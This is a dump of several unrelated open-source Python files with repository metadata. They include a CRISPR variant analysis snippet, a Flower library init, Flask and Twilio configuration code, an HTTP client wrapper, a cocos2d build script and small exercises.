for cas in cas_list:
if cas == 'SpCas9_VQR_1':
in_pam=set(annot_variants.query(f'makes_{cas} or breaks_{cas} or makes_SpCas9_VQR_2 or breaks_SpCas9_VQR_2')['id'].tolist())
near_pam=set(annot_variants.query(f'var_near_{cas} or var_near_SpCas9_VQR_2')['id'].tolist())
both = in_pam.intersection(near_pam)
both_dict['SpCas9_VQR'] += len(both)
in_only = in_pam.difference(near_pam)
in_dict['SpCas9_VQR'] += len(in_only)
near_only = near_pam.difference(in_pam)
near_dict['SpCas9_VQR'] += len(near_only)
elif cas == 'SpCas9_VQR_2':
continue
else:
in_pam=set(annot_variants.query(f'makes_{cas} or breaks_{cas}')['id'].tolist())
near_pam=set(annot_variants.query(f'var_near_{cas}')['id'].tolist())
both = in_pam.intersection(near_pam)
both_dict[cas] += len(both)
in_only = in_pam.difference(near_pam)
in_dict[cas] += len(in_only)
near_only = near_pam.difference(in_pam)
near_dict[cas] += len(near_only)
in_df = pd.DataFrame.from_dict(in_dict, orient='index')
in_df.columns = ['in_pam']
near_df = pd.DataFrame.from_dict(near_dict, orient='index')
near_df.columns = ['near_pam']
both_df = pd.DataFrame.from_dict(both_dict, orient='index')
both_df.columns = ['both']
# set up output dataframe
plot_df_out = in_df.merge(near_df,
left_index=True, right_index=True).merge(both_df, left_index=True,
right_index=True).divide(total_vars)
# save to file
plot_df_out.to_csv(f'{out_dir}/vars_near_in_df.tsv', sep='\t')
| [
"keoughkath@gmail.com"
] | keoughkath@gmail.com |
d6276e415487898851243f5c53a4f4dd06e136eb | 5485db6dd499451327934c18f2fdcd51e8076d54 | /src/py/flwr/common/__init__.py | bcda11c3db5cbfc24718881e0d4df52c076e9e62 | [
"Apache-2.0"
] | permissive | zliel/flower | 4ccfb87b232ab94afcbdf69ea83c878261ac625e | c5a4b2718bed5ec73a3838cc997c38b5ba4862e7 | refs/heads/main | 2023-02-12T03:49:14.989260 | 2021-01-08T15:50:35 | 2021-01-08T15:50:35 | 328,227,435 | 0 | 0 | Apache-2.0 | 2021-01-09T19:09:29 | 2021-01-09T19:09:28 | null | UTF-8 | Python | false | false | 1,761 | py | # Copyright 2020 Adap GmbH. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Flower utilities shared between server and client."""
from .parameter import bytes_to_ndarray as bytes_to_ndarray
from .parameter import ndarray_to_bytes as ndarray_to_bytes
from .parameter import parameters_to_weights as parameters_to_weights
from .parameter import weights_to_parameters as weights_to_parameters
from .typing import Disconnect as Disconnect
from .typing import EvaluateIns as EvaluateIns
from .typing import EvaluateRes as EvaluateRes
from .typing import FitIns as FitIns
from .typing import FitRes as FitRes
from .typing import Parameters as Parameters
from .typing import ParametersRes as ParametersRes
from .typing import Reconnect as Reconnect
from .typing import Weights as Weights
GRPC_MAX_MESSAGE_LENGTH: int = 536_870_912 # == 512 * 1024 * 1024
__all__ = [
"bytes_to_ndarray",
"Disconnect",
"EvaluateIns",
"EvaluateRes",
"FitIns",
"FitRes",
"GRPC_MAX_MESSAGE_LENGTH",
"ndarray_to_bytes",
"Parameters",
"parameters_to_weights",
"ParametersRes",
"Reconnect",
"Weights",
"weights_to_parameters",
]
| [
"noreply@github.com"
] | zliel.noreply@github.com |
94201870b49b0bb7c6b9c0e36a1f4c0cfcda92d2 | 8d0d664839f2f2c48e9e919d2c17bd4fae7812ac | /texts_to_self/config.py | 51a75a2fcd074fbeb8a2ed4cbcdcef88e60d3917 | [] | no_license | iMel408/texts_to_self | 15a3fc650753684cd92570cf168b3947c1fd4a41 | 5b53e9dbc0c839bb19f83262282da474c95fee9f | refs/heads/master | 2022-12-13T08:49:20.099017 | 2019-07-07T14:27:34 | 2019-07-07T14:27:34 | 186,907,626 | 1 | 0 | null | 2022-12-08T05:10:31 | 2019-05-15T21:51:37 | Python | UTF-8 | Python | false | false | 470 | py | import configparser
config = configparser.ConfigParser()
config.read('texts_to_self/env.cfg')
os.environ['SECRET_KEY'],
SECRET_KEY = config['flask']['secret']
TWILIO_ACCOUNT_SID = config['twilio_api']['sid']
TWILIO_AUTH_TOKEN = config['twilio_api']['token']
FROM_PHONE = config['phones']['twilio']
ADMIN_PHONE = config['phones']['admin']
USERNAME = config['login']['username']
PASSWORD = config['login']['password']
BASE_URL = config['server']['url'].rstrip('/')
| [
"melissascampini@gmail.com"
] | melissascampini@gmail.com |
cd05b9c66b95fe844a81ef8918fdebfd11c81376 | b86fae199d0d1eb62be6edc8c56c0dae2b0077a9 | /PythonTutorials/flask_app.py | 19dc5e0b705916373d31914d39fdd2315d7a32e1 | [] | no_license | Tudi/TempStorage | 5657fae8876c055d85f535636a18763676bfac9b | 1fcf4df2fdda1ebf34c818a1df0d777e4cc9a864 | refs/heads/master | 2023-07-23T12:47:34.292055 | 2023-07-17T11:24:49 | 2023-07-17T11:24:49 | 55,682,824 | 10 | 5 | null | 2022-12-07T17:50:27 | 2016-04-07T09:42:49 | C | UTF-8 | Python | false | false | 1,961 | py | import datetime
from flask import Flask, request, render_template
from peewee import Model, CharField, DateField, SqliteDatabase
app = Flask(__name__)
app.config['DEBUG'] = True
app.config["Environment"] = "Development"
@app.route('/index')
def Hello_world():
return "Hello world"
@app.route('/test/<int:first_number>/<int:second_number>')
def Hello_world2(first_number=0, second_number=0):
return f"Hello world. Got numbers {first_number} {second_number}"
@app.route('/<first_number>/<second_number>')
def Hello_world3(first_number=0, second_number=0):
return f" Got numbers {first_number} {second_number}, {request.args}"
dbTVShows = SqliteDatabase('TVShows.db')
class TVShow(Model):
class Meta:
database = dbTVShows
name = CharField()
year_start = DateField(default=datetime.date.today(), null=True)
year_end = DateField(default=datetime.date.today(), null=True)
def create_tables():
dbTVShows.connect()
dbTVShows.create_tables([TVShow])
def drop_tables():
dbTVShows.drop_tables([TVShow])
def AddNewTVSEntry(TVShowName):
tvs = TVShow()
tvs.name = TVShowName
tvs.save()
return tvs.get_id()
@app.route('/tv-show/<int:tv_show_id>')
def tv_show_details(tv_show_id):
toPrint = f"TV show {tv_show_id}"
# QueryRes = TVShow().select().filter(id=tv_show_id).get()
try:
QueryRes = TVShow().get_by_id(tv_show_id)
toPrint += "<br>Name of the show : " + QueryRes.name
except TVShow.DoesNotExist as ex:
toPrint += "<br>This id has no show assigned to it. Err : " + str(ex)
return toPrint
@app.route('/tvshow/<int:tv_show_id>')
def tv_show_details_templated(tv_show_id):
try:
tv_show = TVShow().get_by_id(tv_show_id)
return render_template("tv_show_template.html", tv_show=tv_show)
except TVShow.DoesNotExist as ex:
return "Id does not exist"
return ""
create_tables()
AddNewTVSEntry("MyShow")
app.run()
| [
"jozsab1@gmail.com"
] | jozsab1@gmail.com |
415beba6c61cf7ecef07ef791a319764562c8b6f | 0b64701dbf438a868d936a47996ec01575519fe5 | /WHOISinfo/venv/lib/python3.8/site-packages/simpleurllib3.py | d700a032ac8c4e41a3c0b429d0a71d29894840ad | [] | no_license | mhNi00/APIprograms | 1f1d27064827f33052e153981a8d982f6ed73d2c | 23809d29770c3c8eae2d654a73d2b9d468bc9972 | refs/heads/main | 2023-05-15T03:02:02.508012 | 2021-06-08T18:19:01 | 2021-06-08T18:19:01 | 359,907,474 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,404 | py | """
Easy to use urllib3 simplifier.
Usage:
```
>>> client = simpleurllib3.Client()
>>> resp = client.get('http://httpbin.org/ip')
>>> resp.status
200
>>> resp.data
"{'origin': '127.0.0.1'}"
"""
import warnings
import pkg_resources
import urllib3
import certifi
import luddite
class OutdatedModuleWarning(ImportWarning):
"""
ImportWarning class for outdated modules.
"""
def _outdated_warn(module_name: str, *extra_msg):
"""
Execute warnings.warn for OutdatedModuleWarning.
"""
message = f'Module "{module_name}" outdated'
if extra_msg:
warnings.warn(f"{message}, {extra_msg[0]}", OutdatedModuleWarning)
else:
warnings.warn(message, OutdatedModuleWarning)
def _get_package_version(package_name: str):
"""
Get the installed package's version.
"""
return pkg_resources.get_distribution(package_name).version
warnings.simplefilter("module", category=OutdatedModuleWarning)
if luddite.get_version_pypi('urllib3') != _get_package_version('urllib3'):
_outdated_warn("urllib3")
class SSLClient:
"""
Secure SSL PoolManager client.
"""
if luddite.get_version_pypi('certifi') != _get_package_version('certifi'):
_outdated_warn("certifi", "SSL might not work properly")
ssl_poolmanager = urllib3.PoolManager(
cert_reqs='CERT_REQUIRED',
ca_certs=certifi.where()
)
def get(self, url, fields=None, headers=None):
"""
Returns urllib3.response.HTTPResponse,
refer to urllib3 docs for more info.
"""
return self.ssl_poolmanager.request_encode_url("GET", url, fields=fields, headers=headers)
def post(self, url, fields=None, headers=None):
"""
Returns urllib3.response.HTTPResponse,
refer to urllib3 docs for more info.
"""
return self.ssl_poolmanager.request_encode_body("POST", url, fields=fields, headers=headers)
def put(self, url, fields=None, headers=None):
"""
Returns urllib3.response.HTTPResponse,
refer to urllib3 docs for more info.
"""
return self.ssl_poolmanager.request_encode_body("PUT", url, fields=fields, headers=headers)
def delete(self, url, fields=None, headers=None):
"""
Returns urllib3.response.HTTPResponse,
refer to urllib3 docs for more info.
"""
return self.ssl_poolmanager.request_encode_url("DELETE", url, fields=fields, headers=headers)
def patch(self, url, fields=None, headers=None):
"""
Returns urllib3.response.HTTPResponse,
refer to urllib3 docs for more info.
"""
return self.ssl_poolmanager.request_encode_body("PATCH", url, fields=fields, headers=headers)
def head(self, url, fields=None, headers=None):
"""
Returns urllib3.response.HTTPResponse,
refer to urllib3 docs for more info.
"""
return self.ssl_poolmanager.request_encode_url("HEAD", url, fields=fields, headers=headers)
def options(self, url, fields=None, headers=None):
"""
Returns urllib3.response.HTTPResponse,
refer to urllib3 docs for more info.
"""
return self.ssl_poolmanager.request_encode_url("OPTIONS", url, fields=fields, headers=headers)
class Client:
"""
PoolManager client.
"""
poolmanager = urllib3.PoolManager()
def get(self, url, fields=None, headers=None):
"""
Returns urllib3.response.HTTPResponse,
refer to urllib3 docs for more info.
"""
return self.poolmanager.request_encode_url("GET", url, fields=fields, headers=headers)
def post(self, url, fields=None, headers=None):
"""
Returns urllib3.response.HTTPResponse,
refer to urllib3 docs for more info.
"""
return self.poolmanager.request_encode_body("POST", url, fields=fields, headers=headers)
def put(self, url, fields=None, headers=None):
"""
Returns urllib3.response.HTTPResponse,
refer to urllib3 docs for more info.
"""
return self.poolmanager.request_encode_body("PUT", url, fields=fields, headers=headers)
def delete(self, url, fields=None, headers=None):
"""
Returns urllib3.response.HTTPResponse,
refer to urllib3 docs for more info.
"""
return self.poolmanager.request_encode_url("DELETE", url, fields=fields, headers=headers)
def patch(self, url, fields=None, headers=None):
"""
Returns urllib3.response.HTTPResponse,
refer to urllib3 docs for more info.
"""
return self.poolmanager.request_encode_body("PATCH", url, fields=fields, headers=headers)
def head(self, url, fields=None, headers=None):
"""
Returns urllib3.response.HTTPResponse,
refer to urllib3 docs for more info.
"""
return self.poolmanager.request_encode_url("HEAD", url, fields=fields, headers=headers)
def options(self, url, fields=None, headers=None):
"""
Returns urllib3.response.HTTPResponse,
refer to urllib3 docs for more info.
"""
return self.poolmanager.request_encode_url("OPTIONS", url, fields=fields, headers=headers)
| [
"michalnawarecki@wp.pl"
] | michalnawarecki@wp.pl |
12fed0bc773dcdc74c7354af413d3ba82c78af68 | 8015e3ba1cbc677b499bf9c4c4910189800ce3bf | /python/arithmetic-operators/main.py | cd902d62758fadaff60f837cdae7a9db50529c31 | [] | no_license | wanariffoo/coding-practice | 48db6a2ae7b0df5d525db596ff9f279deb7aa958 | 5689e4b3be58918d9b41a9f05e24797a5f15de0f | refs/heads/master | 2020-09-01T13:30:26.724563 | 2020-08-02T22:58:05 | 2020-08-02T22:58:05 | 218,968,426 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 205 | py | # https://www.hackerrank.com/challenges/python-arithmetic-operators/problem
if __name__ == '__main__':
a = int(input())
b = int(input())
print('{0} \n{1} \n{2}'.format((a + b), (a - b), (a * b))) | [
"wanarif_foo@hotmail.com"
] | wanarif_foo@hotmail.com |
34215bb3f33e0ccc1fb0937cbb976722eb8b69d8 | f88dc05250d7bb954c9ae28aed55b1df4fe6241d | /NotiManagerAdmin/cocos2d/tools/gen-prebuilt/gen_prebuilt_libs.py | d8d3e06119e5517250300b7581fafe568e35e384 | [] | no_license | RoughHands/NotiManagerClient | 73c73e18d16b3fa18b0b3a7c4f136e0d89d48904 | 6d3716d6746c6b0454d601950a4636ed499974f6 | refs/heads/master | 2021-01-18T11:00:05.037575 | 2015-10-11T06:12:04 | 2015-10-11T06:12:04 | 23,171,940 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,486 | py | #!/usr/bin/python
# ----------------------------------------------------------------------------
# generate the prebuilt libs of engine
#
# Copyright 2014 (C) zhangbin
#
# License: MIT
# ----------------------------------------------------------------------------
'''
Generate the prebuilt libs of engine
'''
import os
import subprocess
import shutil
import sys
import excopy
import json
from argparse import ArgumentParser
if sys.platform == 'win32':
import _winreg
ANDROID_SO_PATH = "frameworks/runtime-src/proj.android/libs"
ANDROID_A_PATH = "frameworks/runtime-src/proj.android/obj/local"
MK_PATH = "frameworks/runtime-src/proj.android/jni/Application.mk"
CONSOLE_PATH = "tools/cocos2d-console/bin"
def os_is_win32():
return sys.platform == 'win32'
def os_is_mac():
return sys.platform == 'darwin'
def run_shell(cmd, cwd=None):
p = subprocess.Popen(cmd, shell=True, cwd=cwd)
p.wait()
if p.returncode:
raise subprocess.CalledProcessError(returncode=p.returncode, cmd=cmd)
return p.returncode
class Generator(object):
XCODE_CMD_FMT = "xcodebuild -project \"%s\" -configuration Release -target \"%s\" %s CONFIGURATION_BUILD_DIR=%s"
CONFIG_FILE = "build_config.json"
KEY_XCODE_PROJ_INFO = "xcode_proj_info"
KEY_WIN32_PROJ_INFO = "win32_proj_info"
KEY_OUTPUT_DIR = "outputdir"
KEY_TARGETS = "targets"
def __init__(self, args):
self.need_clean = args.need_clean
self.enable_strip = args.enable_strip
self.use_incredibuild = args.use_incredibuild
self.tool_dir = os.path.realpath(os.path.dirname(__file__))
self.no_android = args.no_android
self.engine_dir = os.path.join(self.tool_dir, os.path.pardir, os.path.pardir)
self.load_config()
def load_config(self):
cfg_json = os.path.join(self.tool_dir, Generator.CONFIG_FILE)
f = open(cfg_json)
cfg_info = json.load(f)
f.close()
self.xcode_proj_info = cfg_info[Generator.KEY_XCODE_PROJ_INFO]
self.win32_proj_info = cfg_info[Generator.KEY_WIN32_PROJ_INFO]
def modify_mk(self, mk_file):
if os.path.isfile(mk_file):
file_obj = open(mk_file, "a")
file_obj.write("\nAPP_ABI :=armeabi armeabi-v7a\n")
file_obj.close()
def build_android(self):
# build .so for android
language = "lua"
console_dir = os.path.join(self.engine_dir, CONSOLE_PATH)
cmd_path = os.path.join(console_dir, "cocos")
proj_name = "My%sGame" % language
proj_path = os.path.join(self.engine_dir, proj_name)
if os.path.exists(proj_path):
shutil.rmtree(proj_path)
# create a runtime project
create_cmd = "%s new -l %s -t runtime -d %s %s" % (cmd_path, language, self.engine_dir, proj_name)
run_shell(create_cmd)
# Add multi ABI in Application.mk
mk_file = os.path.join(proj_path, MK_PATH)
self.modify_mk(mk_file)
# build it
build_cmd = "%s compile -s %s -p android --ndk-mode release -j 4" % (cmd_path, proj_path)
run_shell(build_cmd)
# copy .a to prebuilt dir
obj_dir = os.path.join(proj_path, ANDROID_A_PATH)
prebuilt_dir = os.path.join(self.tool_dir, "prebuilt", "android")
copy_cfg = {
"from": obj_dir,
"to": prebuilt_dir,
"include": [
"*.a$"
]
}
excopy.copy_files_with_config(copy_cfg, obj_dir, prebuilt_dir)
if self.enable_strip:
# strip the android libs
ndk_root = os.environ["NDK_ROOT"]
if os_is_win32():
if self.is_32bit_windows():
bit_str = "x86"
else:
bit_str = "x86_64"
sys_folder_name = "windows-%s" % bit_str
elif os_is_mac():
sys_folder_name = "darwin-x86_64"
strip_cmd_path = os.path.join(ndk_root, "toolchains/arm-linux-androideabi-4.8/prebuilt/%s/arm-linux-androideabi/bin/strip" % sys_folder_name)
if os.path.exists(strip_cmd_path):
strip_cmd = "%s -S %s/armeabi*/*.a" % (strip_cmd_path, prebuilt_dir)
run_shell(strip_cmd)
# remove the project
shutil.rmtree(proj_path)
def get_required_vs_version(self, proj_file):
# get the VS version required by the project
import re
file_obj = open(proj_file)
pattern = re.compile(r"^# Visual Studio.+(\d{4})")
num = None
for line in file_obj:
match = pattern.match(line)
if match is not None:
num = match.group(1)
break
if num is not None:
if num == "2012":
ret = "11.0"
elif num == "2013":
ret = "12.0"
else:
ret = None
else:
ret = None
return ret
def get_vs_cmd_path(self, require_version):
# find the VS in register, if system is 64bit, should find vs in both 32bit & 64bit register
if self.is_32bit_windows():
reg_flag_list = [ _winreg.KEY_WOW64_32KEY ]
else:
reg_flag_list = [ _winreg.KEY_WOW64_64KEY, _winreg.KEY_WOW64_32KEY ]
needUpgrade = False
vsPath = None
try:
for reg_flag in reg_flag_list:
print("find vs in reg : %s" % ("32bit" if reg_flag == _winreg.KEY_WOW64_32KEY else "64bit"))
vs = _winreg.OpenKey(
_winreg.HKEY_LOCAL_MACHINE,
r"SOFTWARE\Microsoft\VisualStudio",
0,
_winreg.KEY_READ | reg_flag
)
try:
i = 0
while True:
try:
# enum the keys in vs reg
version = _winreg.EnumKey(vs, i)
find_ver = float(version)
# find the vs which version >= required version
if find_ver >= float(require_version):
key = _winreg.OpenKey(vs, r"SxS\VS7")
vsPath, type = _winreg.QueryValueEx(key, version)
if os.path.exists(vsPath):
if float(version) > float(require_version):
needUpgrade = True
break
else:
vsPath = None
except:
continue
finally:
i += 1
except:
pass
# if find one right vs, break
if vsPath is not None:
break
except WindowsError as e:
message = "Visual Studio wasn't installed"
print(e)
raise Exception(message)
commandPath = os.path.join(vsPath, "Common7", "IDE", "devenv")
return (needUpgrade, commandPath)
def is_32bit_windows(self):
arch = os.environ['PROCESSOR_ARCHITECTURE'].lower()
archw = os.environ.has_key("PROCESSOR_ARCHITEW6432")
return (arch == "x86" and not archw)
def build_win32_proj(self, cmd_path, sln_path, proj_name, mode):
build_cmd = " ".join([
"\"%s\"" % cmd_path,
"\"%s\"" % sln_path,
"/%s \"Release|Win32\"" % mode,
"/Project \"%s\"" % proj_name
])
run_shell(build_cmd)
def build_win32(self):
print("Building Win32")
for key in self.win32_proj_info.keys():
output_dir = self.win32_proj_info[key][Generator.KEY_OUTPUT_DIR]
proj_path = os.path.join(self.engine_dir, key)
require_vs_version = self.get_required_vs_version(proj_path)
needUpgrade, vs_command = self.get_vs_cmd_path(require_vs_version)
# get the build folder & win32 output folder
build_folder_path = os.path.join(os.path.dirname(proj_path), "Release.win32")
if os.path.exists(build_folder_path):
shutil.rmtree(build_folder_path)
os.makedirs(build_folder_path)
win32_output_dir = os.path.join(self.tool_dir, output_dir)
if os.path.exists(win32_output_dir):
shutil.rmtree(win32_output_dir)
os.makedirs(win32_output_dir)
# upgrade projects
if needUpgrade:
commandUpgrade = ' '.join([
"\"%s\"" % vs_command,
"\"%s\"" % proj_path,
"/Upgrade"
])
run_shell(commandUpgrade)
if self.use_incredibuild:
# use incredibuild, build whole sln
build_cmd = " ".join([
"BuildConsole",
"%s" % proj_path,
"/build",
"/cfg=\"Release|Win32\""
])
run_shell(build_cmd)
if not self.use_incredibuild:
# build the projects
for proj_name in self.win32_proj_info[key][Generator.KEY_TARGETS]:
self.build_win32_proj(vs_command, proj_path, proj_name, "build")
lib_file_path = os.path.join(build_folder_path, "%s.lib" % proj_name)
if not os.path.exists(lib_file_path):
# if the lib is not generated, rebuild the project
self.build_win32_proj(vs_command, proj_path, proj_name, "rebuild")
if not os.path.exists(lib_file_path):
raise Exception("Library %s not generated as expected!" % lib_file_path)
# copy the libs into prebuilt dir
for file_name in os.listdir(build_folder_path):
file_path = os.path.join(build_folder_path, file_name)
shutil.copy(file_path, win32_output_dir)
print("Win32 build succeeded.")
def build_ios_mac(self):
for key in self.xcode_proj_info.keys():
output_dir = self.xcode_proj_info[key][Generator.KEY_OUTPUT_DIR]
proj_path = os.path.join(self.engine_dir, key)
ios_out_dir = os.path.join(self.tool_dir, output_dir, "ios")
mac_out_dir = os.path.join(self.tool_dir, output_dir, "mac")
ios_sim_libs_dir = os.path.join(ios_out_dir, "simulator")
ios_dev_libs_dir = os.path.join(ios_out_dir, "device")
for target in self.xcode_proj_info[key][Generator.KEY_TARGETS]:
build_cmd = Generator.XCODE_CMD_FMT % (proj_path, "%s iOS" % target, "-sdk iphonesimulator", ios_sim_libs_dir)
run_shell(build_cmd, self.tool_dir)
build_cmd = Generator.XCODE_CMD_FMT % (proj_path, "%s iOS" % target, "-sdk iphoneos", ios_dev_libs_dir)
run_shell(build_cmd, self.tool_dir)
build_cmd = Generator.XCODE_CMD_FMT % (proj_path, "%s Mac" % target, "", mac_out_dir)
run_shell(build_cmd, self.tool_dir)
# generate fat libs for iOS
for lib in os.listdir(ios_sim_libs_dir):
sim_lib = os.path.join(ios_sim_libs_dir, lib)
dev_lib = os.path.join(ios_dev_libs_dir, lib)
output_lib = os.path.join(ios_out_dir, lib)
lipo_cmd = "lipo -create -output \"%s\" \"%s\" \"%s\"" % (output_lib, sim_lib, dev_lib)
run_shell(lipo_cmd)
# remove the simulator & device libs in iOS
shutil.rmtree(ios_sim_libs_dir)
shutil.rmtree(ios_dev_libs_dir)
if self.enable_strip:
# strip the libs
ios_strip_cmd = "xcrun -sdk iphoneos strip -S %s/*.a" % ios_out_dir
run_shell(ios_strip_cmd)
mac_strip_cmd = "xcrun strip -S %s/*.a" % mac_out_dir
run_shell(mac_strip_cmd)
def build_all_libs(self):
if os_is_mac():
# build for iOS & Mac
self.build_ios_mac()
if os_is_win32():
# build for win32
self.build_win32()
if not self.no_android:
self.build_android()
def do_generate(self):
output_dir = os.path.join(self.tool_dir, "prebuilt")
if self.need_clean and os.path.exists(output_dir):
shutil.rmtree(output_dir)
self.build_all_libs()
if __name__ == "__main__":
parser = ArgumentParser(description="Generate prebuilt engine for Cocos Engine.")
parser.add_argument('-c', dest='need_clean', action="store_true", help='Remove the \"prebuilt\" directory first.')
parser.add_argument('-n', "--no-android", dest='no_android', action="store_true", help='Not build android libs.')
parser.add_argument('-s', "--strip", dest='enable_strip', action="store_true", help='Strip the generated libs.')
parser.add_argument('-i', "--incredibuild", dest='use_incredibuild', action="store_true", help='Use incredibuild to build win32 projects. Only available on windows.')
(args, unknown) = parser.parse_known_args()
if len(unknown) > 0:
print("unknown arguments: %s" % unknown)
gen_obj = Generator(args)
gen_obj.do_generate()
| [
"sinhyub@gmail.com"
] | sinhyub@gmail.com |
a5d01803894a913c19db18352f78d138ce00dd9c | 3577df7abbb49dc3e83dc116cfb9e9e9f44bfbe9 | /Init.py | bb145731f27124e5c2a5ebcd9424de615b771306 | [
"MIT"
] | permissive | Garretming/IMSiLopKit | 646fb3b4029f52caa0930549607e734f9b9af4c6 | a55da2da9a055fbc96ccf97cce738405a6d8523b | refs/heads/master | 2023-05-14T00:36:55.929067 | 2021-06-10T10:07:36 | 2021-06-10T10:07:36 | 375,615,581 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,234 | py | '''
Author: your name
Date: 2019-03-08 15:17:28
LastEditTime: 2021-06-10 15:49:40
LastEditors: Please set LastEditors
Description: In User Settings Edit
FilePath: /IMSiLopKit/pod_auto_script/gitInit.py
'''
#!/usr/bin/evn python3
#coding=utf-8
import os
import sys
def parseArgument():
# 1、提交仓库组名 2、项目名 3、提交消息备注
argus = []
for i in range(0,len(sys.argv)):
# print(sys.argv[i])
argus.append(sys.argv[i])
return argus
if __name__ == '__main__':
argus = parseArgument()
path =os.getcwd()
count = 0
for k, v in enumerate(argus):
# print k, v
count = count + 1
if count >2 and count >=4 :
#消息备注
mes = argus[1]
# 仓库组名
store = argus[2]
# 项目名
name = argus[3]
else:
#消息备注
mes = "没有备注"
# 仓库组名
store = "Garretming"
# 项目名
name = os.path.basename(path)
# os.system('git remote add origin git@gitlab.com:' + store +'/' + name +'.git')
os.system('rm -rf .git')
os.system('git init')
os.system('curl -u Garretming -d \'{"name":"IMSiLopKit","description":"IMSiLopKit is a ui for slg games"}\' https://api.github.com/user/repos')
os.system('git remote add origin git@github.com:Garretming/IMSiLopKit.git')
# os.system('git submodule add git@github.com:Garretming/csb2csd.git csb2csd')
# os.system('git submodule add git@gitlab.com:Clark8/apktool.git apktool')
# os.system('git submodule add https://github.com/cloudwu/skynet.git skynet')
# os.system('git submodule add https://github.com/simongog/sdsl-lite.git 3rd/sdsl-lite')
# os.system('git submodule add https://github.com/driedfruit/jenkins-minimal-perfect-hash.git 3rd/perfect-hash')
# os.system('git submodule add https://github.com/mpx/lua-cjson.git 3rd/cjson')
# os.system('git submodule add https://github.com/cloudwu/pbc.git 3rd/pbc')
os.system('git add .gitignore')
# os.system('git pull --rebase')
os.system('git commit -m ' + '\"' + mes + '\"')
# os.system('git stash')
os.system('git push -u origin master')
| [
"Please make sure you have the correct access rightsand the repository exists.Completed with errors, see abovePushing to gitee.com:Garret_829/ghiot.gitgit@gitee.com: Permission denied (publickey).plyy520523@qq.com"
] | Please make sure you have the correct access rightsand the repository exists.Completed with errors, see abovePushing to gitee.com:Garret_829/ghiot.gitgit@gitee.com: Permission denied (publickey).plyy520523@qq.com |
b931342b6d9004f19690c272364da7cf8f82d932 | 343bfc5758566f31bb4f49ad870d81102b8a8cd2 | /inference.py | 9481a031a6f4116a90beee2351e9dbbaf7a3d17f | [
"Apache-2.0"
] | permissive | anminhhung/GAN-Pytorch-Template | fd3875a3837cff7a868f60568da36ff58055df21 | 5ea1a43a4b9957c1a683477645dca6fcedf3c313 | refs/heads/master | 2023-04-01T19:59:40.256016 | 2019-02-24T16:00:10 | 2019-02-24T16:00:10 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,215 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os
import numpy as np
import cv2
import torch
import torch.nn.functional as F
from torch.autograd import Variable
import torchvision.transforms as transforms
class TagPytorchInference(object):
def __init__(self, **kwargs):
_input_size = 320
self.input_size = (_input_size, _input_size)
self.gpu_index = kwargs.get('gpu_index', '0')
os.environ["CUDA_DEVICE_ORDER"] = "PCI_BUS_ID"
os.environ["CUDA_VISIBLE_DEVICES"] = self.gpu_index
# build net
self.net = self._create_model(**kwargs)
# load weights from model
self._load(**kwargs)
self.net.eval()
self.transforms = transforms.ToTensor()
if torch.cuda.is_available():
self.net.cuda()
def close(self):
torch.cuda.empty_cache()
def _create_model(self, **kwargs):
"""
build net
:param kwargs:
:return:
"""
# build net
net = None
return net
def _load(self, **kwargs):
"""
load weights
:param kwargs:
:return:
"""
model_filename = None
state_dict = torch.load(model_filename, map_location=None)
self.net.load_state_dict(state_dict)
def run(self, image_data, **kwargs):
_image_data = self.image_preprocess(image_data)
input = self.transforms(_image_data)
_size = input.size()
input = input.resize_(1, _size[0], _size[1], _size[2])
if torch.cuda.is_available():
input = input.cuda()
out = self.net(Variable(input))
return out.data.cpu().numpy().tolist()
def image_preprocess(self, image_data):
_image = cv2.resize(image_data, self.input_size)
_image = _image[:,:,::-1] # bgr2rgb
return _image.copy()
if __name__ == "__main__":
tagInfer = TagPytorchInference(module_name=module_name,net_name=net_name,
num_classes=num_classes, model_name=model_name,
input_size=input_size)
result = tagInfer.run(image)
# post-processing with result
pass
print('done!') | [
"frotms@gmail.com"
] | frotms@gmail.com |
72686e90d0df1916583d7cc774458465981a2994 | 2029fa6e3446c5e01b27739e7e0dcac7b3791fef | /count_wins.py | 88c1a4d64dfeb1a744d9a96517adbfe6d23266e3 | [
"MIT"
] | permissive | alan-nguyen/master-python | 82daa7341ba9e68ced9125d8833b00ae04a6e948 | 2e1cc773123f4bdb0ab2ff0acd667e2e16ccdc4f | refs/heads/master | 2021-08-18T15:58:38.207359 | 2020-07-02T04:12:24 | 2020-07-02T04:12:24 | 200,452,905 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,596 | py | def count_wins(dice1, dice2):
assert len(dice1) == 6 and len(dice2) == 6
dice1_wins, dice2_wins = 0, 0
for i in range(0, len(dice1)):
for j in range(0, len(dice2)):
if dice1[i] > dice2[j]:
dice1_wins += 1
elif dice1[i] < dice2[j]:
dice2_wins += 1
return (dice1_wins, dice2_wins)
# # Test cases
# dice1 = [1, 2, 3, 4, 5, 6]
# dice2 = [1, 2, 3, 4, 5, 6]
# # Expect 15, 15
# print(count_wins(dice1, dice2))
# dice1 = [1, 1, 6, 6, 8, 8]
# dice2 = [2, 2, 4, 4, 9, 9]
# # Expect 16, 20
# print(count_wins(dice1, dice2))
def find_the_best_dice(dices):
assert all(len(dice) == 6 for dice in dices)
size = len(dices)
# Empty list to store win time of each dice
count = [0] * size
for i in range(0, size):
for j in range(i+1, size):
result_wini, result_winj = count_wins(dices[i], dices[j])
if result_wini > result_winj:
count[i] += 1
elif result_wini < result_winj:
count[j] += 1
# Check if best dice exits
# Return index of best dice
for i in range(0, size):
if count[i] == size - 1:
return i
# No best dice
return -1
# Test cases
test1 = [[1, 1, 6, 6, 8, 8], [2, 2, 4, 4, 9, 9], [3, 3, 5, 5, 7, 7]]
# Expected result -1
print(find_the_best_dice(test1))
test2 = [[1, 1, 2, 4, 5, 7], [1, 2, 2, 3, 4, 7], [1, 2, 3, 4, 5, 6]]
# Expected result 2
print(find_the_best_dice(test2))
